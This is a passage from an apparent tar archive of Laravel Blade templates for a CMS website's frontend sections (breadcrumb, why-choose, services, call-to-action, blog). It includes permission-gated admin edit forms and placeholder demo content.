asset('uploads/img/career/breadcrumb/'.$career_content->custom_breadcrumb_image) }}" @endif @elseif (!empty($breadcrumb_image->section_image)) data-bg-image-path="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('career check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="breadcrumb-inner"> <h1>{{ $career->title }}</h1> <ul class="breadcrumb-links"> <li><a href="{{ url('/') }}">{{ __('frontend.home') }}</a></li> <li class="active">{{ $career->title }}</li> </ul> </div> </div> </div> </div> </section> <!--// Breadcrumb Section end //--> @if(Auth::user()) @can('career check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service-content.create"> <input type="hidden" name="style" value="{{ $career->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb_and_page_seo') }} </button> </form> </div> </div> @endcan @endif @elseif ($page_builder->page_name == 'career-detail-show' && isset($page)) @if(Auth::user()) @can('page check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Breadcrumb Section Start //--> <section class="breadcrumb-section section" data-scroll-index="1" @if (!empty($page->custom_breadcrumb_image)) @if ($page->breadcrumb_status == 'yes') data-bg-image-path="{{ asset('uploads/img/page/breadcrumb/'.$page->custom_breadcrumb_image) }}" @endif @elseif (!empty($breadcrumb_image->section_image)) data-bg-image-path="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('page check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="breadcrumb-inner"> <h1>{{ $page->title }}</h1> <ul class="breadcrumb-links"> <li><a href="{{ url('/') }}">{{ __('frontend.home') }}</a></li> <li class="active">{{ $page->title }}</li> </ul> </div> </div> </div> </div> </section> <!--// Breadcrumb Section end //--> @if(Auth::user()) @can('page check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service-content.create"> <input type="hidden" name="style" value="{{ $page->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb_and_page_seo') }} </button> </form> </div> </div> @endcan @endif @else @if(Auth::user()) @can('page builder check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Breadcrumb Section Start //--> <section class="breadcrumb-section section" data-scroll-index="1" @if (!empty($page_builder->custom_breadcrumb_image) && $page_builder->breadcrumb_status == 'yes') data-bg-image-path="{{ asset('uploads/img/page_builder/breadcrumb/'.$page_builder->custom_breadcrumb_image) }}" @elseif (!empty($breadcrumb_image->section_image)) data-bg-image-path="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('page builder check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="breadcrumb-inner"> <h1>{{ $page_builder->breadcrumb_title }}</h1> @php $str = $page_builder->breadcrumb_item; $array_items = explode(",",$str); @endphp <ul class="breadcrumb-links"> @foreach ($array_items as $item) @if (!$loop->last) <li>@php echo html_entity_decode($item); @endphp</li> @else <li class="active">@php echo html_entity_decode($item); @endphp</li> @endif @endforeach @unset($item) </ul> </div> </div> </div> </div> </section> <!--// Breadcrumb Section end //--> @if(Auth::user()) @can('page builder check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="page-builder.edit"> <input type="hidden" name="style" value="{{ $page_builder->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb_and_page_seo') }} </button> </form> </div> </div> @endcan @endif @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/why_choose/why-choose-style1.blade.php��������������������������������������0000644�����������������00000034332�14765366572�0020633 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Skills Section Start //--> <section class="section"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> @isset ($why_choose_section_style1) @if (!empty($why_choose_section_style1->section_image)) <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.3s"> <div class="skills-img"> <img src="{{ asset('uploads/img/why_choose/'.$why_choose_section_style1->section_image) }}" alt="About image" title="why choose image" class="img-fluid"> <span class="icon-check"><i class="fa fa-check"></i></span> <div class="icon-border-line"></div> </div> </div> @endif @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.3s"> <div class="skills-img"> <img src="{{ asset('uploads/img/dummy/480x600.jpg') }}" alt="About image" title="About image" class="img-fluid"> <span class="icon-check"><i class="fa fa-check"></i></span> <div class="icon-border-line"></div> </div> </div> @endif @endisset <div class="col-lg-6 wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.3s"> <div class="skills-inner"> @isset ($why_choose_section_style1) <h6>@php echo html_entity_decode($why_choose_section_style1->section_title); @endphp</h6> <h2>@php echo html_entity_decode($why_choose_section_style1->title); @endphp</h2> <p>@php echo html_entity_decode($why_choose_section_style1->description); @endphp</p> @if (!empty($why_choose_section_style1->item)) @php $str = $why_choose_section_style1->item; $array_items = explode(",",$str); @endphp <div class="row"> <div class="col-md-6 col-sm-6"> <ul class="mb-resp-15"> @foreach($array_items as $index => $item) @if($index < count($array_items) / 2) <li>{{ $item }}</li> @endif @endforeach @unset ($item) </ul> </div> <div class="col-md-6 col-sm-6"> <ul> @foreach($array_items as $index => $item) @if($index >= count($array_items) / 2) <li>{{ $item }}</li> @endif @endforeach @unset ($item) </ul> </div> </div> @endif @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <h6>Why Choose Us</h6> <h2>We are specialize in frameworks UI for years</h2> <p> A front end library is being released every day and it is requested to master these technologies.I also follow the market every day and follow the updates of new frontend frameworks and programming frameworks. It is easier for me to keep up with new technologies in projects </p> <div class="row"> <div class="col-md-6 col-sm-6"> <ul class="mb-resp-15"> <li>Full Responsive Design</li> <li>Modern Browser Compatible</li> </ul> </div> <div class="col-md-6 col-sm-6"> <ul> <li>Clean & Quality Code</li> <li>7/24 Customer Support</li> </ul> </div> </div> @endif @endisset @if (is_countable($why_chooses_style1) && count($why_chooses_style1) > 0) <div class="row"> @foreach ($why_chooses_style1 as $item) <div class="col-md-6 col-sm-6 skills-item-resp"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="why-choose.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="skills-item"> <div class="skills-item-text"> <h5>@php echo html_entity_decode($item->title); @endphp</h5> </div> <div class="body"> <h2 class="counter">{{ $item->timer }}</h2> <div class="skills-progress-bar"> <div class="skills-progress-value slideInLeft wow" data-percent="{{ $item->timer }}"></div> </div> </div> </div> </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-md-6 col-sm-6 skills-item-resp"> <div class="skills-item"> <div class="skills-item-text"> <h5>Design</h5> </div> <div class="body"> <h2 class="counter">80</h2> <div class="skills-progress-bar"> <div class="skills-progress-value slideInLeft wow" data-percent="80"></div> </div> </div> </div> </div> <div class="col-sm-6 col-md-6 skills-item-resp"> <div class="skills-item"> <div class="skills-item-text"> <h5>Coding</h5> </div> <div class="body"> <h2 class="counter">90</h2> <div class="skills-progress-bar"> <div class="skills-progress-value slideInLeft wow" data-percent="90"></div> </div> </div> </div> </div> </div> @endif @endif </div> </div> </div> </div> </section> <!--// Skills Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="why-choose.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="why-choose.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_why_choose') }} </button> </form> </div> </div> @endcan @endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/service/service-style2.blade.php��������������������������������������������0000644�����������������00000044006�14765366572�0017477 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('service check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Services Section Start //--> <section class="section pb-minus-70"> <div class="container"> @if(Auth::user()) @can('service check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> <div class="col-md-12"> @if (is_countable($service_count_categories) && count($service_count_categories) > 0) <div class="text-center mb-5 custom-category-link"> <a href="{{ url($page_builder->page_uri) }}" class="current mb-2">{{ __('frontend.all_services') }}</a> @foreach ($service_count_categories as $service_count_category) @if (isset($service_count_category->service_category->service_category_slug)) <a class="mb-2" href="{{ route('default-service-category-index', $service_count_category->service_category->service_category_slug) }}">{{$service_count_category->service_category->category_name }} ({{ $service_count_category->category_count }})</a> @endif @endforeach @unset ($service_count_category) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="text-center mb-5 custom-category-link"> <a href="#" class="link-dark">Creative</a> <a href="#" class="link-secondary">Business</a> <a href="#" class="link-secondary">UI / UX Design</a> <a href="#" class="link-secondary">Marketing</a> </div> @endif @endif </div> </div> @if (is_countable($services_paginate_style) && count($services_paginate_style) > 0) <div class="row"> @foreach ($services_paginate_style as $item) <div class="col-lg-4 col-md-6 wow fadeInLeft" data-wow-duration="0.5s" data-wow-delay="0.{{ $loop->iteration }}s"> @if(Auth::user()) @can('service check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="services-item"> @if (!empty($item->section_image_2)) <img src="{{ asset('uploads/img/service/'.$item->section_image_2) }}" alt="Services image" class="services-bg-img"> @endif <div class="body"> <h4>0{{$loop->index + 1 }}</h4> <h5>{{ $item->title }}</h5> <p>{{ $item->short_description }}</p> @if (!empty($item->button_name)) <div class="btn-box"> <a href="{{ $item->button_url }}">{{ $item->button_name }} <i class="fa fa-arrow-right"></i></a> </div> @else <div class="btn-box"> @if (!empty($service_detail_show->page_uri)) <a href="{{ url($service_detail_show->page_uri.'/'.$item->service_slug) }}">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> @else <a class="custom-max-width-80" href="{{ route('default-service-detail-show', ['service_slug' => $item->service_slug]) }}">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> @endif </div> @endif </div> @if ($item->type == 'icon') @if (!empty($item->icon)) <div class="icon"> <span class="{{ $item->icon }}"></span> </div> <div class="icon-border"></div> @endif @else @if (!empty($item->section_image)) <div class="icon"> <img src="{{ asset('uploads/img/service/'.$item->section_image) }}" alt="service icon"> </div> @endif @endif </div> </div> @endforeach @unset ($item) </div> <div class="row"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $services_paginate_style->links() }} </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-4 col-md-6 wow fadeInLeft" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>01</h4> <h5>Web Design</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-tablet"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.2s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>02</h4> <h5>Graphic Design</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-adjust"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInRight" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>03</h4> <h5>UI/UX Design</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fab fa-uikit"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInLeft" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>04</h4> <h5>Content Writing</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-blog"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.2s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>05</h4> <h5>Scripts & Plugin</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-code"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInRight" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>06</h4> <h5>Digital Marketing</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-bullhorn"></span> </div> <div class="icon-border"></div> </div> </div> </div> @endif @endif </div> </section> <!--// Services Section End //--> @if(Auth::user()) @can('service check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service.index"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_service') }} </button> </form> </div> </div> @endcan @endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/service/service-style1.blade.php��������������������������������������������0000644�����������������00000044606�14765366572�0017504 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('service check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Services Section Start //--> <section class="section pb-minus-70"> <div class="container"> @if(Auth::user()) @can('service check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($service_section_style1) <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>@php echo html_entity_decode($service_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($service_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>Services</span> <h2>Our Services</h2> </div> </div> </div> @endif @endisset @if (is_countable($services_style1) && count($services_style1) > 0) <div class="row"> @foreach ($services_style1 as $item) <div class="col-lg-4 col-md-6 wow fadeInLeft" data-wow-duration="0.5s" data-wow-delay="0.{{ $loop->iteration }}s"> @if(Auth::user()) @can('service check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="services-item"> @if (!empty($item->section_image_2)) <img src="{{ asset('uploads/img/service/'.$item->section_image_2) }}" alt="Services image" class="services-bg-img"> @endif <div class="body"> <h4>0{{$loop->index + 1 }}</h4> <h5>{{ $item->title }}</h5> <p>{{ $item->short_description }}</p> @if (!empty($item->button_name)) <div class="btn-box"> <a href="{{ $item->button_url }}">{{ $item->button_name }} <i class="fa fa-arrow-right"></i></a> </div> @else <div class="btn-box"> <a href="{{ route('default-service-detail-show', ['service_slug' => $item->service_slug]) }}">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> @endif </div> @if ($item->type == 'icon') @if (!empty($item->icon)) <div class="icon"> <span class="{{ $item->icon }}"></span> </div> <div class="icon-border"></div> @endif @else @if (!empty($item->section_image)) <div class="icon"> <img class="custom-max-width-80" src="{{ asset('uploads/img/service/'.$item->section_image) }}" alt="service icon"> </div> @endif @endif </div> </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-4 col-md-6 wow fadeInLeft" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>01</h4> <h5>Web Design</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-tablet"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.2s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>02</h4> <h5>Graphic Design</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-adjust"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInRight" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>03</h4> <h5>UI/UX Design</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fab fa-uikit"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInLeft" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>04</h4> <h5>Content Writing</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-blog"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.2s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>05</h4> <h5>Scripts & Plugin</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-code"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInRight" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>06</h4> <h5>Digital Marketing</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-bullhorn"></span> </div> <div class="icon-border"></div> </div> </div> </div> @endif @endif <div class="row"> @isset ($service_section_style1) <div class="col-md-12 text-center"> <a href="{{ $service_section_style1->button_url }}" class="primary-btn"> <span class="text">{{ $service_section_style1->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-md-12 text-center"> <a href="javascript:void(0)" class="primary-btn"> <span class="text">Get Started</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> @endif @endisset </div> </div> </section> <!--// Services Section End //--> @if(Auth::user()) @can('service check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service.index"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_service') }} </button> </form> </div> </div> @endcan @endif ��������������������������������������������������������������������������������������������������������������������������views/frontend/sections/call_to_action/call-to-action-style1.blade.php������������������������������0000644�����������������00000012345�14765366572�0022157 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif @isset ($cta_section_style1) <section id="cta"> <div class="call-to-action mt-0"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row align-items-center"> <div class="col-md-6"> <div class="call-to-action-inner"> <h2>@php echo html_entity_decode($cta_section_style1->title); @endphp</h2> </div> </div> <div class="col-md-6"> <div class="call-to-action-btn"> @if (!empty($cta_section_style1->button_name)) <a href="{{ $cta_section_style1->button_url }}" class="white-btn"> <span class="text">{{ $cta_section_style1->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @endif </div> </div> </div> </div> </div> </section> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <section id="cta"> <div class="call-to-action mt-0"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row align-items-center"> <div class="col-md-6"> <div class="call-to-action-inner"> <h2>Dou you need a new project ?</h2> </div> </div> <div class="col-md-6"> <div class="call-to-action-btn"> <a href="#" data-scroll-nav="7" class="white-btn"> <span class="text">Contact Me</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> </div> </div> </div> </div> </section> @endif @endisset @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="call-to-action.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_call_to_action') }} </button> </form> </div> </div> @endcan @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/blog/blog-style2.blade.php��������������������������������������������������0000644�����������������00000050760�14765366572�0016251 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('blog check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Blog Section Start //--> <section class="section" id="blog"> <div class="container"> @if(Auth::user()) @can('blog check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> <div class="col-md-12"> @if (is_countable($blog_count_categories) && count($blog_count_categories) > 0) <div class="text-center mb-5 custom-category-link"> <a href="{{ url($page_builder->page_uri) }}" class="current mb-2">{{ __('frontend.all_blogs') }}</a> @foreach ($blog_count_categories as $blog_count_category) @if (isset($blog_count_category->category->category_slug)) <a class="link-secondary mb-2" href="{{ route('default-blog-category-index', $blog_count_category->category->category_slug) }}">{{$blog_count_category->category->category_name }} ({{ $blog_count_category->category_count }})</a> @endif @endforeach @unset ($blog_count_category) </div> @else <div class="text-center mb-5 custom-category-link"> <a href="#" class="link-dark">Creative</a> <a href="#" class="link-secondary">Business</a> <a href="#" class="link-secondary">UI / UX Design</a> <a href="#" class="link-secondary">Marketing</a> </div> @endif </div> </div> @if (is_countable($blogs_paginate_style) && count($blogs_paginate_style) > 0) <div class="row"> @foreach ($blogs_paginate_style as $item) <div class="col-lg-4 col-md-6"> @if(Auth::user()) @can('blog check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="blog-item"> @if (!empty($item->section_image)) <div class="blog-img"> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}"> <img src="{{ asset('uploads/img/blog/thumbnail/'.$item->section_image) }}" alt="Blog image" class="img-fluid"> </a> </div> @else <div class="blog-img"> <a href="{{ 